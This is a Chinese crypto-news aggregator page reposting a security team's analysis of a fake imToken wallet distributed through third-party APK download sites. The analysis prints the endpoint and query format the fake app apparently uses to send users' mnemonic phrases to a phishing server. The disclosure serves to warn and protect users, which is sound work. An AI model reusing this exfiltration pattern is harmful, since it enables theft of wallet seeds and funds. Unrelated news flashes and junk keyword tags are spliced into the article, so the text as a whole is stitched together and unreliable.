区块见闻 区块见闻
Ctrl+D收藏区块见闻
首页 > PEPE > 正文

ETH:慢雾:Web3假钱包第三方源调查分析_ethereal做英文名

作者:

时间:

背景

基于区块链技术的Web3正在驱动下一代技术革命,越来越多的人开始参与到这场加密浪潮中,但Web3与Web2是两个截然不同的世界。Web3世界是一个充满着各种各样的机遇以及危险的黑暗森林,身处Web3世界中,钱包则是进入Web3世界的入口以及通行证。当你通过钱包在Web3世界中探索体验诸多的区块链相关应用和网站的过程中,你会发现在一条公链上每个应用都是使用钱包“登录”;这与我们传统意义上的“登录”不同,在Web2世界中,每个应用之间的账户不全是互通的。但在Web3的世界中,所有应用都是统一使用钱包去进行“登录”,我们可以看到“登录”钱包时显示的不是“LoginwithWallet”,取而代之的是“ConnectWallet”。而钱包是你在Web3世界中的唯一通行证。俗话说高楼之下必有阴影,在如此火热的Web3世界里,钱包作为入口级应用,自然也被黑灰产业链盯上。

ConsenSys已更新隐私政策,将收集MetaMask用户交易时的IP地址和ETH地址:11月24日消息,以太坊基础设施开发公司ConsenSys更新了其隐私政策,声明当用户在MetaMask中使用Infura作为默认RPC时,将在用户发送交易时收集对应的IP地址和ETH地址。如果用户使用自己的以太坊节点或第三方RPC提供商,那么Infura和MetaMask不会收集用户的IP地址或ETH地址,具体情况将取决于用户所使用的RPC提供商进行的任何信息收集以及他们关于此类要求的条款。[2022/11/24 8:03:34]

在Android环境下,由于很多手机不支持GooglePlay或者因为网络问题,很多人会从其他途径下载GooglePlay的应用,比如:apkcombo、apkpure等第三方下载站,这些站点往往标榜自己App是从GooglePlay镜像下载的,但是其真实安全性如何呢?网站分析

鉴于下载途径众多,我们今天以apkcombo为例看看,apkcombo是一个第三方应用市场,它提供的应用据官方说大部分来源于其他正规应用商店,但事实是否真如官方所说呢?我们先看下apkcombo的流量有多大:

美SEC向HEX、PulseChain和PulseX推广者发出传票:11月6日消息,美国证券交易委员会(SEC)向HEX、PulseChain和PulseX等加密货币的推广者发出传票。

据悉,美国证券交易委员会正在打击社交媒体大V向数百万投资者兜售有风险的、未公开的代币的行为。(cointelegraph)[2022/11/6 12:23:13]

据数据统计站点similarweb统计,apkcombo站点:全球排名:1,809国家排名:7,370品类排名:168我们可以看到它的影响力和流量都非常大。它默认提供了一款chromeAPK下载插件,我们发现这款插件的用户数达到了10W+:

Earning.Farm遭受闪电贷攻击,黑客获利268 ETH:10月15日消息,据Supremacy安全团队监测,Earning.Farm的EFLeverVault合约遭到两次闪电贷攻击,第一笔攻击被MEV bot截获,造成合约损失480 ETH;第二笔黑客完成攻击,黑客获利268 ETH。

经过分析,漏洞是由合约的闪电贷回调函数未验证闪电贷发起者产生,攻击者可自行触发合约的闪电贷回调逻辑:偿还合约内的Aave stETH债务并提现,然后将stETH兑换为ETH。随后攻击者可调用withdraw函数提现所有合约内的ETH余额。[2022/10/15 14:28:46]

那么回到我们关注的Web3领域中钱包方向,用户如果从这里下载的钱包应用安全性如何?我们拿知名的imToken钱包为例,其GooglePlay的正规下载途径为:https://play.google.com/store/apps/details?id=im.token.app

由于很多手机不支持GooglePlay或者因为网络问题,很多人会从这里下载GooglePlay的应用。而apkcombo镜像站的下载路径为:https://apkcombo.com/downloader/#package=im.token.app

上图我们可以发现,apkcombo提供的版本为24.9.11,经由imToken确认后,这是一个并不存在的版本!证实这是目前市面上假imToken钱包最多的一个版本。在编写本文时imToken钱包的最新版本为2.11.3,此款钱包的版本号很高,显然是为了伪装成一个最新版本而设置的。如下图,我们在apkcombo上发现,此假钱包版本显示下载量较大,此处的下载量应该是爬取的GooglePlay的下载量信息,安全起见,我们觉得有必要披露这个恶意App的来源,防止更多的人下载到此款假钱包。

同时我们发现类似的下载站还有如:uptodown下载地址:https://imtoken.br.uptodown.com/android

我们发现uptodown任意注册即可发布App,这导致钓鱼的成本变得极低:

钱包分析

在之前我们已经分析过不少假钱包的案例,如:2021-11-24我们披露:《慢雾:假钱包App已致上万人被盗,损失高达十三亿美元》,所以在此不再赘述。我们仅对apkcombo提供版本为24.9.11这款假钱包进行分析,在开始界面创建钱包或导入钱包助记词时,虚假钱包会将助记词等信息发送到钓鱼网站的服务端去,如下图:

根据逆向APK代码和实际分析流量包发现,助记词发送方式:https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助记词>

看下图,最早的“api.funnel.rocks”证书出现在2022-06-03,也就是攻击开始的大概时间:

俗话说一图胜千言,最后我们画一个流程图:

总结

目前这种局活动不仅活跃,甚至有扩大范围的趋势,每天都有新的受害者受。用户作为安全体系最薄弱的环节,应时刻保持怀疑之心,增强安全意识与风险意识,当你使用钱包、交易所时请认准官方下载渠道并从多方进行验证;如果你的钱包从上述镜像站下载,请第一时间转移资产并卸载该软件,必要时可通过官方验证通道核实。同时,如需使用钱包,请务必认准以下主流钱包App官方网址:1/imToken钱包:https://token.im/2/TokenPocket钱包:https://www.tokenpocket.pro/3/TronLink钱包:https://www.tronlink.org/4/比特派钱包:https://bitpie.com/5/MetaMask钱包:https://metamask.io/6/TrustWallet:https://trustwallet.com/请持续关注慢雾安全团队,更多Web3安全风险分析与告警正在路上。致谢:感谢在溯源过程中imToken官方提供的验证支持。由于保密性和隐私性,本文只是冰山一角。慢雾在此建议,用户需加强对安全知识的了解,进一步强化甄别网络钓鱼攻击的能力等,避免遭遇此类攻击。更多的安全知识建议阅读慢雾出品的《区块链黑暗森林自救手册》。

标签:ETHKEDLSDBONDethereal做英文名Wrapped Staked USDTlsd币是什么Bond Appetite USD

PEPE热门资讯
ORT:Foresight Ventures市场周报:市场喘息向上,NFT接近触底_FORTH价格

A.市场观点 一、宏观流动性 货币流动性改善。市场等待5月4日美联储议息会议,预计加息25个基点,大概率是最后一次加息。美国银行危机继续加剧,货币政策转向或加快,年内有望实现降息.

ROLL:以太坊坎昆升级将利好哪些协议?_LAYER

你是否因错过上海升级前的LSD牛市而懊悔不已?不用担心,坎昆升级——一个直接让Layer2代币受益的升级即将到来.

KED:90%APR,LSDFi协议0xAcid是如何做到最高的收益率?_EthereumeRush

以太坊上海升级完成后,ETH的质押收益率可以看作是以太坊的无风险国债利率,基于这一利率衍生出了多种LSDFi协议,在近期都获得了大量的曝光.

SIGNA:爆款平台币预定 — 银币网发布平台币YB“质押挖矿”规则_USDT

自Fcoin开启“交易挖矿”模式,引领了一波交易所平台币机制创新之后,平台币在发行机制方面已经近一年没有太多热点.

USDT:SignalPlus:这算是纾困吗?_USD

各位朋友,欢迎来到SignalPlus宏观点评。SignalPlus宏观点评每天为各位更新宏观市场信息,并分享我们对宏观趋势的观察和看法。欢迎追踪订阅,与我们一起关注最新的市场动态.

UNI:OrangeFinance:可对冲Uniswap V3的流动性管理工具_区块链

最近随着UniswapV3许可证的到期,焦点已经转向新的CLAMM以及简化LP体验的项目。今天,让我们谈谈OrangeFinance,以及它为何它最适合当下的情景.